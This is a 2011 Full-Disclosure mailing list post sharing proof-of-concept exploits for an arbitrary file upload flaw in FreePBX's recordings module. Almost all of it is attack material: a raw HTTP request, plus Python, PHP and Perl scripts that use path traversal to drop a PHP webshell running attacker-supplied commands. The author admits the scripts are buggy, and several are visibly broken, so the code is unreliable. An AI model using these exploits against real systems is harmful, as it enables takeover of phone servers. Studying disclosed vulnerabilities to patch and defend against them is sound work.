[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <BANLkTimJPDGckZcf82kNCLu=K4kGaO2efg@mail.gmail.com>
Date: Fri, 10 Jun 2011 09:08:23 +1000
From: "-= Glowing Doom =-" <secn3t@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: FreePBX - Module Administration Arbitrary
File Upload
ehhhh .... php exploit code has a small bugs in it :P sorry... i just woke
and should have looked... just look at part1 and part2 :) it is pretty
simple to fix...
also when uploading, you create your own /folder/ , using this method
anyhow..
On 10 June 2011 08:59, -= Glowing Doom =- <secn3t@...il.com> wrote:
> Hello...
> I wrote a PoC code, for similar bug in this application, about 3months
> ago... unfortunately, i did not bother to put it on here because well, it
> was nothing much.. but since this 'admin' module has appeared, i will add my
> codes to the thing...: this needs for PBX to 'record' ,notsure if an admin
> module is needed..it seems to ONLY look for the recordings... anyhow have
> fun.. admin i believe :)... nice try to find the sploit guys, i have only
> posted it on my blogs and pastebin about 400times in the past 4months... i
> guess i will put it here next time.. here is some codes for you..:
> -------------------------------------------------------------------------------------------------------
> PoC
> The HTTP request below illustrates the upload of a phpshell::
>
> POST /admin/config.php HTTP/1.1
> Host: 10.10.1.3
> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;
> en-US; rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-us,en;q=0.5
> Accept-Encoding: gzip,deflate
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Keep-Alive: 300
> Proxy-Connection: keep-alive
> Referer: http://10.10.1.3/admin/config.php
> Cookie: ARI=cookieValue; PHPSESSID=cookieValue
> Authorization: Basic base64auth
> Content-Type: multipart/form-data;
> boundary=---------------------------5991806838789183981588991120
> Content-Length: 116089
>
> -----------------------------5991806838789183981588991120
> Content-Disposition: form-data; name="display"
>
> recordings
> -----------------------------5991806838789183981588991120
> Content-Disposition: form-data; name="action"
>
> recordings_start
> -----------------------------5991806838789183981588991120
> Content-Disposition: form-data; name="usersnum"
>
> ../../../../../var/www/html/admin/SpiderLabs
> -----------------------------5991806838789183981588991120
> Content-Disposition: form-data; name="ivrfile"; filename="webshell.php"
> Content-Type: application/octet-stream
> <?php
> /* WebShell code goes here */
> ?>
> -----------------------------5991806838789183981588991120--
>
> OK SO...
>
> In python form:
> #!/usr/bin/env python
> import urllib, re, os, httplib, urllib2, time, socket, getopt, sys
>
> host = $host
> port = 80
>
> s = socket.socket('socket.AF_INET,socket.SOCK_STREAM\r\n')
> s.connectHTTP((host,port))
> s.send(
> 'POST /admin/config.php HTTP/1.1\r\n'
> 'Host: ' + host + '\r\n'
> 'User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;en-US;
> rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7\r\n'
> 'Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n'
> 'Accept-Language: en-us,en;q=0.5\r\n'
> 'Accept-Encoding: gzip,deflate\r\n'
> 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n'
> 'Keep-Alive: 300\r\n'
> 'Proxy-Connection: keep-alive\r\n'
> 'Referer: http://' + host + '/admin/config.php\r\n'
> 'Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n'
> 'Authorization: Basic base64auth\r\n')
> 'Content-Type: multipart/form-data;\r\n'
> 'boundary=---------------------------5991806838789183981588991120\r\n'
> 'Content-Type: multipart/form-data;\r\n'
> 'boundary=---------------------------5991806838789183981588991120\r\n'
> 'Content-Length: 116089\r\n'
> '\r\n'
> '-----------------------------5991806838789183981588991120\r\n'
> 'Content-Disposition: form-data; name="display"\r\n'
> '\r\n'
> 'recordings\r\n'
> '-----------------------------5991806838789183981588991120\r\n'
> 'Content-Disposition: form-data; name="action"\r\n'
> '\r\n'
> 'recordings_start\r\n'
> '-----------------------------5991806838789183981588991120\r\n'
> 'Content-Disposition: form-data; name="usersnum"\r\n'
> '\r\n'
> '../../../../../var/www/html/admin/zmeu.php\r\n'
> '-----------------------------5991806838789183981588991120\r\n'
> 'Content-Disposition: form-data; name="ivrfile"; filename="zmeu.php"\r\n'
> 'Content-Type: application/octet-stream\r\n'
> '\r\n'
> '<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
> '-----------------------------5991806838789183981588991120--\r\n'
>
> and...
>
> IN php:
>
> <?php
> echo "\n\n";
> echo
> "+-------------------------------------------------------------------------+\r\n";
> echo "| FreePBX 2o11 Remote File Upload Exploit |\r\n";
> echo "| Usage: php exploit.php site.com |\r\n";
> echo
> "+-------------------------------------------------------------------------+\r\n";
> echo "\n";
> echo "[+] Code to write to the file (Ex. id;uname -a):\r\n\n";
> $code = trim(fgets(STDIN));
> $socket = @fsockopen($argv[1], 80, $eno, $estr, 10);
> if(!$socket) {
> die("[-] Couldnt connect to: ".$argv[1].". Operation aborted.");
> }
> $part1 = "POST /admin/config.php HTTP/1.1\r\n";
> $part1 .= "Host: " . $argv[1] . "\r\n";
> $part1 .= "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X
> 10.4.6)\r\n";
> $part1 .= "Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
> $part1 .= "Accept-Language: en-us,en;q=0.5\r\n";
> $part1 .= "Accept-Encoding: gzip,deflate\r\n";
> $part1 .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
> $part1 .= "Connection: keep-alive\r\n";
> $part1 .= "Keep-Alive: 300\r\n";
> $part1 .= "Proxy-Connection: keep-alive\r\n";
> $part1 .= "Referer: http://10.1.1.1/admin/config.php\r\n";
> $part1 .= "Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n";
> $part1 .= "Authorization: Basic base64auth\r\n";
> $part1 .= "Content-Type : multipart/form-data;\r\n";
> $part2 =
> "boundary=-----------------------------5991806838789183981588991120--\r\n";
> $part1 .= "Content-Type : multipart/form-data;\r\n";
> $part2 =
> "boundary=-----------------------------5991806838789183981588991120--\r\n";
> $part2 = "Content-Length: 116089\r\n";
> $part2 .= "\r\n";
> $part2 .=
> "-----------------------------5991806838789183981588991120\r\n";
> $part2 .= "Content-Disposition: form-data; name=\"display\"\r\n";
> $part2 .= "\r\n";
> $part2 .= "recordings\r\n";
> $part2 .=
> "---------------------------5991806838789183981588991120\r\n";
> $part2 .= "Content-Disposition: form-data; name=\"action\"\r\n";
> $part2 .= "\r\n";
> $part2 .= "recordings_start\r\n";
> $part2 .=
> "---------------------------5991806838789183981588991120\r\n";
> $part2 .= "Content-Disposition: form-data;
> name=\"usersnum\"\r\n";
> $part2 .= "\r\n";
> $part2 .= "Content-Disposition: form-data;
> name=\"../../../../../var/www/html/admin/xd\"\r\n";
> $part2 .=
> "---------------------------5991806838789183981588991120\r\n";
> $part2 .= "Content-Disposition: form-data; name=\"ivrfile\";
> filename=\"shell.php\"\r\n";
> $part2 .= "Content-Type: application/octet-stream\r\n";
> $part2 .= "\r\n";
> $part2 .= "<?php echo \'<pre>\' + system(\'$code\') + \'</pre>\';
> ?>\r\n";
> $part2 .=
> "-----------------------------5991806838789183981588991120--\r\n";
> $part1 .= $part2;
> fwrite($socket, $part1);
> echo "[!] Check the upload folder (/var/www/html/admin/xd) ..";
> } else {
> echo "\n\n";
> echo "+---------------------------------------------------+\r\n";
> echo "| Usage: php exploit.php site.com |\r\n";
> echo "+---------------------------------------------------+\r\n";
> echo "\n\n";
> }
> ?>
>
> and in perl..
>
> #!/usr/bin/perl
> use IO::Socket::INET;
> use Crypt::SSLeay;
> use Net::SSL;
>
> sub usage {
> print "perl $0 <Host> <Cmd>\n";
> exit(1);
> }
> my($host, $cmd) = @ARGV or usage();
> print "[+] Connecting to host...\n";
> my $sock = IO::Socket::INET->new(Proto => 'tcp',PeerAddr => $host,PeerPort
> => 80,Timeout => 10) or die "[-] Connect error..\n";
> if(!sock) {
> print "[-] Non-SSL PBX NOT HERE!\n";
> exit(-1);
> else {
> $sock = Net::SSL->new(Proto => 'tcp',PeerAddr => $host,PeerPort =>
> 443,Timeout => 10) or die "[-] Connect error..\n";
> print "[-] SSL PBX NOT HERE!\n";
> exit(-1);
> }
> print "[+] Connected.. Sending Buffer\n";
> my $temp=
> "POST /admin/config.php HTTP/1.1\n".
> "Host: $host:80/\n".
> "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4.6)\n".
> "Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n".
> "Accept-Language: en-us,en;q=0.5\n".
> "Accept-Encoding: gzip,deflate\n".
> "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n".
> "Keep-Alive: 300\n".
> "Proxy-Connection: keep-alive\n".
> "Referer: http://$host/admin/config.php\n".
> "Cookie: ARI=cookieValue; PHPSESSID=cookieValue\n".
> "Authorization: Basic base64auth\n".
> "Connection: keep-alive\n".
> "Content-Type : multipart/form-data;\n".
> "---------------------------5991806838789183981588991120\n".
> "Content-Length: 116089\n".
> "\n".
> "Content-Disposition: form-data; name=\"display\"\n".
> "recordings\n".
> "\n".
> "---------------------------5991806838789183981588991120\n".
> "Content-Disposition: form-data; name=\"action\"\n".
> "recordings_start\n".
> "\n".
> "---------------------------5991806838789183981588991120\n".
> "Content-Disposition: form-data; name=\"usersnum\"\n".
> "\n".
> "---------------------------5991806838789183981588991120\n".
> "Content-Disposition: form-data;
> name=\"../../../../../var/www/html/admin/xd\"\n".
> "Content-Disposition: form-data; name="ivrfile"; filename="shell.php\n".
> "Content-Type: application/octet-stream\n".
> "\n".
> "<?php ". $cmd ." ?>\n".
> "-----------------------------5991806838789183981588991120--\n\n";
>
> print "[+] Sent file 'shell.php' to act as webshell ..\n";
> my $buffer_size=length($temp);
> $temp;
> my $answer=0;
> $buffer=~s/siz/$buffer_size/g;
> print $sock $buffer;
> if ($sock) {
> print "[+] Buffer sent..running command: $cmd ..\n";
> while ($answer=<$sock>) {
> print $answer;
> print results "[!] Server reply: $answer ..\n";
> }
> }
> }
>
> have fun! Perl one is abit rough..
> dru
>
> xd @ #haxNET @ Efnet
>
> (National LULZ day is here!)
>
> And for those guys who 'exploited' it... this PoC was released like 3months
> ago... what the hell are yu guiys on about, and where is even a HEADER
> showing explotation :S seems you have started a group but forgot to check
> this for previous bugs :) hehe... nomatter, it is now debugged for you.
>
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists